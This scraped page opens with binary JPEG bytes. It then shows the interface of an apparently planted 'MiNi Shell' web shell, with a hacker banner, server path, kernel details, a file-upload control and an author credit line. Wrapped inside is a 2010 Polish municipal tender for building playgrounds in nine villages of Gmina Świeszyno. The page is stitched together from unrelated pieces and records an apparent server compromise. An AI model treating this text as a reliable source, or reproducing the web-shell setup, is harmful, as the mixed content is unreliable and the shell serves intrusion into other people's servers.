JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100616/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100616/169598-N-2010.html

<p class="kh_header"><b>Świeszyno: Budowa placów zabaw w dziewięciu miejscowościach Gminy Świeszyno</b><br>
<b>Numer ogłoszenia: 169598 - 2010; data zamieszczenia: 16.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Świeszyno , Świeszyno 71, 76-024 Świeszyno, woj. zachodniopomorskie, tel. 094 3161496, 3161270, faks 094 3161491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ug.swieszyno.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw w dziewięciu miejscowościach Gminy Świeszyno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Roboty obejmują wykonanie w szczególności: 
Bardzlino:
 - roboty ziemne (plantowanie terenu, wykop pod  nawierzchnię żwirową w pobliżu  
   urządzeń zabawowych, siew trawy)
-  montaż urządzeń zabawowych
1	.  Ławka x 2
2	.  Kosz na śmieci
3	.  Piaskownica
4	.  Sprężynowiec
5	.  Zestaw zabawowy
6	.  Huśtawka wagowa
7	.  Huśtawka podwójna
8	. Tablica Regulaminowa
      - montaż wyposażenia uzupełniającego (ławki, pojemniki na śmieci, stojak na 
        rowery, tablica regulaminowa)

         Giezkowo:
      - roboty ziemne (plantowanie terenu, spulchnianie, wykop pod nawierzchnię 
        żwirową w pobliżu urządzeń zabawowych  i wykonanie nawierzchni żwirowej, 
        siew trawy)
      - montaż urządzeń zabawowych
         1.  Ławka x 2
         2.  Kosz na śmieci
         3.  Piaskownica
         4.  Sprężynowiec
         5.  Zestaw zabawowy
         6.  Huśtawka wagowa
         7.  Huśtawka podwójna
         8.  Belka balansująca
         9.  Tablica Regulaminowa
       10.  Stojak na rowery
      - montaż wyposażenia uzupełniającego (ławki, pojemniki na śmieci, stojak na 
        rowery, tablica regulaminowa)

Kurozwęcz:
     -  roboty ziemne (plantowanie terenu, spulchnianie, wykop pod nawierzchnię 
        żwirową w pobliżu urządzeń zabawowych  i wykonanie nawierzchni żwirowej, 
        siew trawy)
     -  montaż urządzeń zabawowych
        1.  Ławka x 2
        2.  Kosz na śmieci
        3.  Piaskownica
        4.  Sprężynowiec
        5.  Zestaw zabawowy
        6.  Huśtawka wagowa
        7.  Huśtawka podwójna
        8.  Tablica Regulaminowa
        9.  Stojak na rowery
     -  montaż wyposażenia uzupełniającego (ławki, pojemniki na śmieci, stojak na 
        rowery, tablica regulaminowa)

Konikowo:
    -  roboty ziemne (plantowanie terenu, wykop pod nawierzchnię żwirową w pobliżu 
       urządzeń zabawowych, wykonanie nawierzchni żwirowej, siew trawy )
    -  montaż urządzeń zabawowych
       1.  Ławka x 2
       2.  Kosz na śmieci
       3.  Piaskownica
       4.  Sprężynowiec
       5.  Zestaw zabawowy
       6.  Huśtawka wagowa
       7.  Huśtawka podwójna
       8.  Belka balansująca
       9.  Tablica Regulaminowa
     10.  Stojak na rowery
     11.  Czworobok zręcznościowy
     12.  Ogrodzenie
     13.  Furtka wejściowa
    -  montaż wyposażenia uzupełniającego (ławki, pojemniki na śmieci, stojak na 
       rowery, tablica regulaminowa)
    -  montaż ogrodzenia z furtką

Mierzym:
    -  roboty ziemne (plantowanie terenu, spulchnianie, wykop pod nawierzchnię 
       żwirową w pobliżu urządzeń zabawowych  i wykonanie nawierzchni żwirowej, 
       siew trawy)
    -  montaż urządzeń zabawowych
       1.  Ławka x 2
       2.  Kosz na śmieci
       3.  Piaskownica
       4.  Sprężynowiec x 2
       5.  Zestaw zabawowy
       6.  Huśtawka wagowa
       7.  Huśtawka podwójna
       8.  Tablica Regulaminowa
       9.  Stojak na rowery
   -   montaż wyposażenia uzupełniającego (ławki, pojemniki na śmieci, stojak na 
       rowery, tablica regulaminowa)

Niedalino:
    -  roboty ziemne ( wykop pod nawierzchnię żwirową w pobliżu urządzeń 
       zabawowych i wykonanie nawierzchni żwirowej, siew trawy)
    -  montaż urządzeń zabawowych
       1.  Ławka x 2
       2.  Kosz na śmieci
       3.  Piaskownica
       4.  Sprężynowiec x 2
       5.  Zestaw zabawowy
       6.  Huśtawka wagowa
       7.  Huśtawka podwójna
       8.  Tablica Regulaminowa
       9.  Stojak na rowery
      10. belka balansująca
      11. czworobok zręcznościowy
    -  montaż wyposażenia uzupełniającego (ławki, pojemniki na śmieci, stojak na 
        rowery, tablica regulaminowa)

Niekłonice:
    -  roboty ziemne (plantowanie terenu, wykop pod nawierzchnię żwirową w pobliżu 
       urządzeń zabawowych, wykonanie nawierzchni żwirowej, siew trawy )
    -  rozbiórka istniejącego cokołu ogrodzenia
    -  montaż urządzeń zabawowych
       1.  Ławka x 2
       2.  Kosz na śmieci
       3.  Piaskownica
       4.  Sprężynowiec
       5.  Zestaw zabawowy
       6.  Huśtawka wagowa
       7.  Huśtawka podwójna
       8.  Tablica Regulaminowa
       9.  Stojak na rowery
     10.  Ogrodzenie
     11.  Furtka
    -  montaż wyposażenia uzupełniającego (ławki, pojemniki na śmieci, stojak na 
       rowery, tablica regulaminowa)
   -   montaż ogrodzenia z furtką

Strzekęcino:
  -   roboty ziemne ( wykop pod nawierzchnię żwirową w pobliżu urządzeń 
      zabawowych i wykonanie nawierzchni żwirowej, siew trawy)
  -  wykonanie chodnika i schodów terenowych
  -  montaż urządzeń zabawowych
     1.  Ławka x 2
     2.  Kosz na śmieci
     3.  Piaskownica
     4.  Sprężynowiec x 2
     5.  Zestaw zabawowy
     6.  Huśtawka wagowa
     7.  Huśtawka podwójna
     8.  Belka balansująca
     9.  Tablica Regulaminowa
   10.  Stojak na rowery
   11.  Czworobok zręcznościowy
   12.  Schody terenowe
   13.  Chodnik
  -  montaż wyposażenia uzupełniającego (ławki, pojemniki na śmieci, stojak na 
     rowery, tablica regulaminowa)

Świeszyno:
  -  roboty ziemne ( wykop pod nawierzchnię żwirową w pobliżu urządzeń 
     zabawowych i wykonanie nawierzchni żwirowej, siew trawy)
   -  montaż urządzeń zabawowych
      1.  Ławka x 5
      2.  Kosz na śmieci x 2
      3.  Piaskownica
      4.  Sprężynowiec x 3
      5.  Zestaw zabawowy
      6.  Huśtawka wagowa x 2
      7.  Huśtawka podwójna x 2
      8.  Belka balansująca
      9.   Tablica Regulaminowa
    10.  Stojak na rowery x 2
    11.  Karuzela bączek
    12.  Karuzela - 4 siedziskowa
   -  montaż wyposażenia uzupełniającego (ławki, pojemniki na śmieci, stojak na 
      rowery, tablica regulaminowa)
2.  Roboty budowlane określone w ust. 1 zostaną wykonane zgodnie z dokumentacją 
     projektową, warunkami prowadzonego postępowania, z obowiązującymi 
     przepisami, polskimi normami i zasadami wiedzy technicznej oraz należytą 
     starannością w ich wykonywaniu, bezpieczeństwem, dobrą jakością i właściwą 
     organizacją.
3.  Elementy wyposażenia muszą posiadać atesty zezwalające na stosowanie ich na 
     placach zabaw..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.13-4, 45.22.38.00-4, 45.11.27.23-9, 77.31.41.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający żąda wniesienia wadium w wysokości 5 000,00 złotych (słownie: pięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę polegającą na budowie placów zabaw o wartości 100 tys. zł (sto tysięcy złotych)  netto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) zamawiający wymaga, by osoba pełniąca funkcję kierownika budowy posiadała uprawnienia budowlane oraz przynależała do właściwej Izby Inżynierów Budownictwa. 
b)  zamawiający dysponuje potencjałem kadrowym niezbędnym do wykonania przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż wartość oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art.144 ust.1 ustawy Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
        A. Zmiany ogólne: 
- zmiana adresu(siedziby Zamawiającego) Wykonawcy;
- zmiana osób występujących po stronie Zamawiającego (Wykonawcy);
- zmiana osób uprawnionych do kontaktu.
       B. Zmiany rzutujące na termin wykonania umowy:
- przedłużająca się procedura przetargowa
- warunki atmosferyczne uniemożliwiające wykonanie umowy w terminie
- inne okoliczności, na które Wykonawca niema wpływu a mają one wpływ na termin 
  wykonania umowy
           C. Zmiany rzutujące na wynagrodzenie możliwa jest zmiana postanowień 
               umowy w związku ze zmianą:
- stawki podatku od towarów i usług (VAT) lub narzuceniem innych obciążeń 
   publiczno - prawnych 
- zmiany związane z pojawieniem się nowych parametrów i norm,
- zmniejszenie zamówienia 
                 D. Określa się następujący tryb dokonywania zmian postanowień umowy:
- Zamawiający wnioskuje do Wykonawcy w sprawie możliwości dokonania wskazanej 
   zmiany;
- Zamawiający wnioskuje, aby Wykonawca przedłożył propozycję zmiany;
- Wykonawca wnioskuje do Zamawiającego o dokonanie wskazanej zmiany.

Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo wykonawcy, protokół konieczności - protokół konieczności wymaga zatwierdzenia przez Zamawiającego), itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ug.swieszyno.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świeszyno, 76-024 Świeszyno 71
Materiały przetargowe bezpłatnie udostępnione są na stronie internetowej ug.swieszyno.ibip.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.07.2010 godzina 10:00, miejsce: Urząd Gminy Świeszyno
76-024 Świeszyno 71
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> tak 
dofinansowanie w ramach działania 413 Wdrażanie lokalnych strategii rozwoju PROW 2007 - 2013 dla operacji które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com